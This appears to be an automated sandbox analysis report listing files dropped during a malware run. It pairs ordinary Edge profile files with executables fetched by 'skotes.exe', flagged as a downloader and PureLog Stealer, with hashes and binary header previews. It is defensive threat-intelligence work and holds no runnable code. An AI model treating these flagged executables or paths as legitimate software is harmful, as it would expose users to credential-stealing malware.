SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWudi1zNtPMAkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynebkzItSmd6qE7lFoC
MD5:	79990C3212C8F5EF8A71B37672A9B52A
SHA1:	F9A76D7F912AD1D133E8CD4435CED7CAC2CEB0DF
SHA-256:	5024B9302AF5B041888148FAF63AAB47C09D665A51EB840CE9938730C8770CE0
SHA-512:	84B206126370670A55525781017D765EBEF3DA6B759E6162EE1E5321CF4C58C9C451292D351BFBBCE7A0A56D1B306513CE1F938C2CAF6A3DC2D960BF673D0123
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6763E317-1E24.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.046397440305158494
Encrypted:	false
SSDEEP:	192:G+ZJ0m5tmBnOAtnYDJxwyB9XCWg0xXTh84NEx2IHppkRQ8g+JBz/KX/n8y08TcmQ:B30Utu4LGEhlEp43Jl/Kv08T2RGOD
MD5:	843E8B47C30FCA3E129653CE37542EEF
SHA1:	554792CFDB966DAE4925C51BBC947A4FB4EACC68
SHA-256:	0B7DFB72A441F99EF4D543426E395D87AE7BC936179DD0AE85E5D4A9F6C5CCCB
SHA-512:	71E666BAA28024325E1F65402F23719C0CD0BE4597D848F67EC9311C83B57794BB7313A8582C8C009616327DEBB522856C91D7BB17471134CD65529E1D8D9EAC
Malicious:	false
Reputation:	unknown
Preview:	...@..@...@.....C.].....@...............Pe...U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".rjrfdw20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.105637406271287
Encrypted:	false
SSDEEP:	3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHL:o1cUh4Y3LbO/BVsJDbYuDRBOyc
MD5:	CFE6AA5BB3888F03C04999ADA5DF1C0A
SHA1:	2F1E4316C1611F3B1E2117090E5E9D177EE6ABF5
SHA-256:	CB2A3986B16815762A2ABF3D5FAD6B35D13BDC6DC2FAE081F1DD1D94DA1E479A
SHA-512:	FF824C1A2BA5788461B7762726C869767BC70B163ABBBBA0AA7430999DA31223E487802955627C4F6EB8ACCA15A5B98F35E80B59D9E5AF85E6308DA1A7B323EF
Malicious:	false
Reputation:	unknown
Preview:	sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.6612262562697895
Encrypted:	false
SSDEEP:	3:NYLFRQZ:ap2Z
MD5:	B64BD80D877645C2DD14265B1A856F8A
SHA1:	F7379E1A6F8CE062E891C56736C789C7EA77CD6A
SHA-256:	83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
SHA-512:	734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
Malicious:	false
Reputation:	unknown
Preview:	117.0.2045.55

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089762246066807
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWudi1zNtPMAkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynebkzItSmd6qE7lFoC
MD5:	79990C3212C8F5EF8A71B37672A9B52A
SHA1:	F9A76D7F912AD1D133E8CD4435CED7CAC2CEB0DF
SHA-256:	5024B9302AF5B041888148FAF63AAB47C09D665A51EB840CE9938730C8770CE0
SHA-512:	84B206126370670A55525781017D765EBEF3DA6B759E6162EE1E5321CF4C58C9C451292D351BFBBCE7A0A56D1B306513CE1F938C2CAF6A3DC2D960BF673D0123
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4ebc4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089762246066807
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWudi1zNtPMAkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynebkzItSmd6qE7lFoC
MD5:	79990C3212C8F5EF8A71B37672A9B52A
SHA1:	F9A76D7F912AD1D133E8CD4435CED7CAC2CEB0DF
SHA-256:	5024B9302AF5B041888148FAF63AAB47C09D665A51EB840CE9938730C8770CE0
SHA-512:	84B206126370670A55525781017D765EBEF3DA6B759E6162EE1E5321CF4C58C9C451292D351BFBBCE7A0A56D1B306513CE1F938C2CAF6A3DC2D960BF673D0123
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4ed4a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089762246066807
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWudi1zNtPMAkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynebkzItSmd6qE7lFoC
MD5:	79990C3212C8F5EF8A71B37672A9B52A
SHA1:	F9A76D7F912AD1D133E8CD4435CED7CAC2CEB0DF
SHA-256:	5024B9302AF5B041888148FAF63AAB47C09D665A51EB840CE9938730C8770CE0
SHA-512:	84B206126370670A55525781017D765EBEF3DA6B759E6162EE1E5321CF4C58C9C451292D351BFBBCE7A0A56D1B306513CE1F938C2CAF6A3DC2D960BF673D0123
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4f941.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089762246066807
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWudi1zNtPMAkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynebkzItSmd6qE7lFoC
MD5:	79990C3212C8F5EF8A71B37672A9B52A
SHA1:	F9A76D7F912AD1D133E8CD4435CED7CAC2CEB0DF
SHA-256:	5024B9302AF5B041888148FAF63AAB47C09D665A51EB840CE9938730C8770CE0
SHA-512:	84B206126370670A55525781017D765EBEF3DA6B759E6162EE1E5321CF4C58C9C451292D351BFBBCE7A0A56D1B306513CE1F938C2CAF6A3DC2D960BF673D0123
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4f98f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089762246066807
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWudi1zNtPMAkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynebkzItSmd6qE7lFoC
MD5:	79990C3212C8F5EF8A71B37672A9B52A
SHA1:	F9A76D7F912AD1D133E8CD4435CED7CAC2CEB0DF
SHA-256:	5024B9302AF5B041888148FAF63AAB47C09D665A51EB840CE9938730C8770CE0
SHA-512:	84B206126370670A55525781017D765EBEF3DA6B759E6162EE1E5321CF4C58C9C451292D351BFBBCE7A0A56D1B306513CE1F938C2CAF6A3DC2D960BF673D0123
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.3488360343066725
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ25AmIpozQp:YQ3Kq9X0dMgAEiLIj
MD5:	8549C255650427D618EF18B14DFD2B56
SHA1:	8272585186777B344DB3960DF62B00F570D247F6
SHA-256:	40395D9CA4B65D48DEAC792844A77D4F8051F1CEF30DF561DACFEEED3C3BAE13
SHA-512:	E5BB8A0AD338372635C3629E306604E3DC5A5C26FB5547A3DD7E404E5261630612C07326E7EBF5B47ABAFADE8E555965A1A59A1EECFC496DCDD5003048898A8C
Malicious:	false
Reputation:	unknown
Preview:	{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":1}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cd340201-f506-49f8-9486-5a1231687975.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44914
Entropy (8bit):	6.095133143351777
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWfEi1zNtkhvoNNi5sUFyKKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn/vscKtSmd6qE7lFoC
MD5:	A8D302B95AEAC47D3A7E64FE87FC126C
SHA1:	BE803CA1191DEFB0245254553B9110C3F9EA6976
SHA-256:	43C01717163D89505670009344568AAE4DDD5182F2CA23A94C3E3342402BC352
SHA-512:	4073D3F9D1CEC6334854F7AD0F0D64E9DA6EF68CAD070D9B9D256388174BDD65D9CAAFD78DA9D593AF3086CFD6D17058CD8EDCDCDDABCFBA3F6187DE3E32558A
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	967680
Entropy (8bit):	6.697239741880639
Encrypted:	false
SSDEEP:	24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8aFd0:zTvC/MTQYxsWR7aF
MD5:	629A3EAF01FB818CD0B1964E454BA39B
SHA1:	8547E7FCBDFEAB3247A48F30B39A1232E96877A6
SHA-256:	B2B6975A924C3A1F11BB59B938B1500785EE92C86DEB537659129C487D3B1FC2
SHA-512:	3F29342B1D5D60C258ADD05F929C8FC077F9AAD839F5E975CE7AAEB7E38A225806C716D3650E28EF5AFF053B89E596995ED1B12FF9881F0DDAF274AA3AC9954E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...s.cg..........".................w.............@.......................... ......m1....@...@.......@.....................d...\|....@...X.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....X...@...Z..................@..@.reloc...u.......v...N..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1801728
Entropy (8bit):	7.946848271724782
Encrypted:	false
SSDEEP:	49152:TfBJWmeQ8azZDbcrMbyOm+hJyFJX94a0FC:T+me+zarJHXea0FC
MD5:	8E89923EFBAC42F80F4E7FC0DC7AAE45
SHA1:	81667219CFB7E2D36D72FAA07FF10315E451FBD5
SHA-256:	5049CB5F3B6DD8FE8DBC93D3D1ABE40C32F69136447F934C65E4F29D3432A922
SHA-512:	D6E57A2B3DAF422985B2FBCA5E0062013662B9E9AD8A66854E626EFE2315FB6A6812AB02A95967D61FD5BDBAA9351C97A85A54640E8E813CB6985D2D614CD5CF
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................`G...........@...........................G.....&{....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......\..............@... ..)..@.......^..............@...hraxhmin.....P.......`..............@...dhruiwut.....PG......X..............@....taggant.0...`G.."...\..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4438776
Entropy (8bit):	7.99505709582503
Encrypted:	true
SSDEEP:	98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
MD5:	3A425626CBD40345F5B8DDDD6B2B9EFA
SHA1:	7B50E108E293E54C15DCE816552356F424EEA97A
SHA-256:	BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
SHA-512:	A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...\|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2928640
Entropy (8bit):	6.475379184436146
Encrypted:	false
SSDEEP:	49152:1K4DY+M6dKHkftnghcsG3TKnYrt1lPXnMIssK:syY+M6dKHkFnghcsSTbrtLXH
MD5:	5081EA72759BA0DEA91A56403FF62DC6
SHA1:	40BDDAE611127BEEB297E9BF3E865AF47B8ED4E7
SHA-256:	7F7E285C14BA16177FAC9340654EBA93F5BCDDD100DC2C7259AFC2AD4CD19D88
SHA-512:	671425D2017542F7A4AABC339C9EC46180AEC25A4EF00915D3851BCAE43024E944ECCE5B226EE5BBFE108A6DA6301A027050DF4748E3A01F1BBE9DC15CF03B2F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........O...........@...........................P.....Ra-...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...assqlaww..+...$...+..\|..............@...blchljdg......O.......,.............@....taggant.0....O.."....,.............@...........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3286016
Entropy (8bit):	7.310046848182974
Encrypted:	false
SSDEEP:	49152:yla31k0wuMKWrJSYQTdfjfkn46z2jnVGd7jyy7qaJJR0BmXSyYO3:yla3/tS4K2jnVGRjHLJfV
MD5:	C00A67D527EF38DC6F49D0AD7F13B393
SHA1:	7B8F2DE130AB5E4E59C3C2F4A071BDA831AC219D
